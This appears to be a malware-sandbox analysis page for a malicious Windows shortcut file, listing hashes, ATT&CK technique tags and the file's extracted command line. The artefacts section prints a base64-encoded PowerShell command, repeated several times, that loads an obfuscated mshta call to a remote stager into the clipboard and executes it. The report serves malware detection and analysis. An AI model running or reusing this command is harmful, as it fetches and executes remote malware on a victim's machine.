Malicious
Malicious

b5fbcce121ee4e0b0a9825875b4cedbf

LNK File
|
MD5: b5fbcce121ee4e0b0a9825875b4cedbf
|
Size: 2.75 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b5fbcce121ee4e0b0a9825875b4cedbf
Sha1
cb82ae80067702e47b5a3a858ba1ae6d164138a3
Sha256
79d3b29e267a7a41068c7ebea0bd4cfe9e16dc0cc03a034c8fadbc4426bfbbf7
Sha384
6eb1645df5ad32f2d20a41429f06c1f684f02c95af74e2a356b7759822979f367b4599d71708c2438d50c5e0ba8c4a1e
Sha512
c27cac3444345c3f71828a3751becdfc08e255bb116a0a371ce2028d72eda301187057bb4aca3fe0c63f887d4fda2ed57b82de48a9b233b4543ff39b10f65e6c
SSDeep
24:8Ayw/BHYVKVWO+/CWuO9xkz4Xxa5gmYXsrsysh6FtmVdd79dsHqThOr:8y5aS6kUXSgmYcQVh6FtmVdJ91Ir
TLSH
9A51F2280AF101EAF673D7B99BF573B24966F7968D259ABC008063414722510B863E3A
File Structure
b5fbcce121ee4e0b0a9825875b4cedbf
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="
b5fbcce121ee4e0b0a9825875b4cedbf (2.75 KB)
File Structure
b5fbcce121ee4e0b0a9825875b4cedbf
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==

Malicious

b5fbcce121ee4e0b0a9825875b4cedbf
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="

Malicious

b5fbcce121ee4e0b0a9825875b4cedbf > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙